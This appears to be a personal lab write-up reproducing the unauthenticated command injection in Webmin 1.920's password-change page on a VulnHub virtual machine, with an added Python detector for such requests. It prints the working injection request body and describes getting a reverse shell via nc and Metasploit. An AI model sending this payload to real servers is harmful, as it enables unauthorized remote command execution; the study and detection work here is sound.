Disclaimer: the vulnerable environment used here is a self-built VulnHub virtual machine, and this is for my own study only.
Vulnerability summary
Webmin is a web-based configuration tool for administering Unix-like systems. Its password-recovery page contains a command injection vulnerability that requires no authentication; through it an attacker can execute arbitrary system commands.
Affected versions: 1.920 and earlier
Environment setup
Test machine IP: 192.168.79.129
Target machine IP: 192.168.79.131
1. Start the VulnHub target environment:
![](https://img.haomeiwen.com/i15420652/95a1a4626c15a764.png)
2. Verify that the target application started successfully:
![](https://img.haomeiwen.com/i15420652/4a1c3e0a03a738c0.png)
3. Confirm the Webmin version with an nmap scan:
![](https://img.haomeiwen.com/i15420652/539b5f6d7955481f.png)
Reproducing the vulnerability
Reference: https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
PoC:
![](https://img.haomeiwen.com/i15420652/188921db0962dfd2.png)
Method 1: manual exploitation
1. Visit the /password_change.cgi page
![](https://img.haomeiwen.com/i15420652/d9049825c7043aa8.png)
2. Intercept the request with Burp
![](https://img.haomeiwen.com/i15420652/d6e67ff96745302c.png)
3. Modify the request and replay it; the vulnerability is confirmed

```http
# Change the request method to POST
# Add the header Referer: https://192.168.79.131:10000/session_login.cgi
# Add the body:
user=test&pam=&expired=2&old=abc|id&new1=cba&new2=cba
```

Note: the value sent in the user parameter is not an existing Linux user on the target.
![](https://img.haomeiwen.com/i15420652/7dbfaddf8bfc3770.png)
4. Start an nc listener on the reverse-shell port
![](https://img.haomeiwen.com/i15420652/4668c755b4eccf73.png)
5. Send the reverse-shell command through Burp
![](https://img.haomeiwen.com/i15420652/497a49b135434377.png)
6. Receive the reverse shell
![](https://img.haomeiwen.com/i15420652/5f4fba9200dd12e9.png)
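As an added defensive example (not code from this write-up or from Webmin), the following Python flags requests of the shape shown in step 3: a POST to /password_change.cgi whose `old` field carries shell metacharacters, which a genuine old password would never contain. The two captured requests embedded at the bottom are constructed for this example.

```python
# Added detection example (not Webmin's or the write-up's code): flag POSTs to
# password_change.cgi whose 'old' field carries shell metacharacters. The two
# captured requests at the bottom are constructed for this example.
import re
from urllib.parse import parse_qs

# A genuine old password is passed through the form unchanged, so command
# separators and substitution syntax in that field indicate injection.
METACHARS = re.compile(r"[|;&`\n]|\$\(")


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def check_password_change(raw: str):
    """Return a finding dict for a suspicious password_change.cgi POST, else None."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path.split("?", 1)[0] != "/password_change.cgi":
        return None
    form = parse_qs(body, keep_blank_values=True)  # also decodes %7C -> '|'
    old = form.get("old", [""])[0]
    if not METACHARS.search(old):
        return None
    return {"user": form.get("user", [""])[0],
            "expired": form.get("expired", [""])[0],
            "old": old,
            "referer": headers.get("referer", "")}


# Constructed samples: the first mirrors the write-up's request, the second is benign.
SUSPICIOUS = ("POST /password_change.cgi HTTP/1.1\r\n"
              "Host: 192.168.79.131:10000\r\n"
              "Referer: https://192.168.79.131:10000/session_login.cgi\r\n"
              "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
              "user=test&pam=&expired=2&old=abc|id&new1=cba&new2=cba")
BENIGN = ("POST /password_change.cgi HTTP/1.1\r\n"
          "Host: 192.168.79.131:10000\r\n"
          "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
          "user=alice&pam=&expired=1&old=Winter2019!&new1=Spring20&new2=Spring20")

if __name__ == "__main__":
    for raw in (SUSPICIOUS, BENIGN):
        print(check_password_change(raw))
```

Because the body is URL-decoded before matching, a percent-encoded pipe (`%7C`) is caught the same way as a literal one.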
Method 2: using MSF
![](https://img.haomeiwen.com/i15420652/e734a02ed596459c.png)
![](https://img.haomeiwen.com/i15420652/7c30aea041e5ef36.png)
![](https://img.haomeiwen.com/i15420652/914ec86fcc01448c.png)
Shutting down the environment
![](https://img.haomeiwen.com/i15420652/a712e297afba0990.png)